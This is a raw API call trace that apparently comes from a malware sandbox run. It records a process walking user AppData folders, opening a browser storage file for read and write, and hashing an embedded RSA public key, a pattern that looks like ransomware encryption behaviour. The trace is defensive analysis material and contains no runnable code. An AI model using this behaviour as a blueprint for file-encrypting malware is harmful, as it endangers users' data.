[0099.169] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.169] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.169] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.169] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.169] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.169] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.169] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.169] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.169] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.169] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0099.169] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.169] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0099.169] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.169] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.169] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0099.169] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.169] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.169] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.169] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.169] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.169] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.170] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.170] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.170] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.170] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.170] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.170] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0099.170] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.170] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.170] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.170] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.170] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.170] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.170] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.170] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.170] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0099.170] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.170] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.170] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\Search\\") returned="Search\\" [0099.170] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b3f60 [0099.170] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.170] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\") returned="10.0\\" [0099.170] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df338 [0099.170] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b3f60 | out: hHeap=0x680000) returned 1 [0099.170] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\") returned="Acrobat\\" [0099.170] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0099.170] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x31621a8 [0099.170] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df338 | out: hHeap=0x680000) returned 1 [0099.170] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0099.170] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0099.170] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31621a8 | out: hHeap=0x680000) returned 1 [0099.170] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0099.170] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb988 [0099.170] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0099.171] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fc220 [0099.171] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0099.171] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3f40 [0099.171] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0099.171] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0099.171] PathFindFileNameW (pszPath="") returned="" [0099.171] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ef00 [0099.171] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\Search\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8287550, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe8287550, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe8287550, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31c7500 [0099.172] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0099.172] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8138 [0099.172] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0099.172] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x99e8060 [0099.172] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0099.172] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0099.172] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fc220 [0099.172] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317f1a0 [0099.173] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0099.173] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b3f60 [0099.173] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0099.173] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x31621a8 [0099.173] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0099.173] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0099.173] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0099.173] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0099.173] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0099.173] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0099.173] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0099.173] PathFindFileNameW (pszPath="") returned="" [0099.176] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0099.176] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0099.176] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\") returned="36USA68T\\" [0099.176] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\") returned="DOMStore\\" [0099.176] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0099.176] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0099.176] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0099.176] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0099.177] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0099.177] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0099.177] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0099.177] PathFindFileNameW (pszPath="") returned="" [0099.177] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml") returned=".xml" [0099.177] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\36usa68t\\imagesrv.adition[1].xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0099.177] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=13) returned 1 [0099.177] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0099.181] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.181] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0xd, lpOverlapped=0x0) returned 1 [0099.182] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.182] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df338) returned 1 [0099.183] CryptCreateHash (in: hProv=0x6df338, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0099.183] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.183] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0099.183] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0099.183] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0099.183] GetLastError () returned 0x0 [0099.183] CryptDestroyHash (hHash=0x31c7580) returned 1 [0099.183] CryptReleaseContext (hProv=0x6df338, dwFlags=0x0) returned 1 [0099.183] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0099.183] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0099.183] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0099.183] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0099.183] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0099.183] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0099.183] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0099.183] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0099.183] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0099.184] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0099.184] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0099.184] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0099.184] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0099.184] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fc220 [0099.184] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5258 [0099.184] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fc268 [0099.184] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5270 [0099.184] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e52a0 [0099.184] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0099.184] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e52b8 [0099.184] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0099.184] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0099.184] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0099.184] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0099.184] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e52a0 | out: hHeap=0x680000) returned 1 [0099.184] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e52b8 | out: hHeap=0x680000) returned 1 [0099.184] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0099.184] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0099.184] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0099.184] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0099.184] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0099.184] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e52b8 [0099.184] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0099.184] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e52a0 [0099.184] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0099.184] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31ccc08 [0099.184] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0099.185] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0099.185] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0099.185] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0099.185] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0099.185] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0099.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ccc08 | out: hHeap=0x680000) returned 1 [0099.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e52b8 | out: hHeap=0x680000) returned 1 [0099.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0099.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e52a0 | out: hHeap=0x680000) returned 1 [0099.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0099.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0099.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0099.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0099.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0099.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0099.185] GetCurrentThreadId () returned 0x8c4 [0099.185] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0099.185] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99e3b20 [0099.185] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0099.185] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df338 [0099.185] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0099.185] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0099.185] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0099.185] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0099.185] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0099.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0099.185] GetCurrentThreadId () returned 0x8c4 [0099.185] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0099.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0099.185] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0099.185] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0099.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0099.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0099.186] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0099.186] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0099.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0099.186] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0099.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0099.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0099.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0099.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0099.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0099.186] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0099.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0099.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0099.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0099.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0099.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0099.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0099.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0099.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e52a0 [0099.186] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0099.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0099.186] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0099.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0099.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0099.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0099.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0099.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e52b8 [0099.186] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0099.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0099.186] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0099.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5288 [0099.186] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0099.187] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0099.187] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0099.187] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0099.187] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0099.187] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0099.187] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0099.187] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e52d0 [0099.187] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0099.187] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e49d0 [0099.187] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0099.187] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0099.187] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0099.187] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0099.187] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0099.187] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0099.187] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e52a0 | out: hHeap=0x680000) returned 1 [0099.187] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e52a0 [0099.187] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | 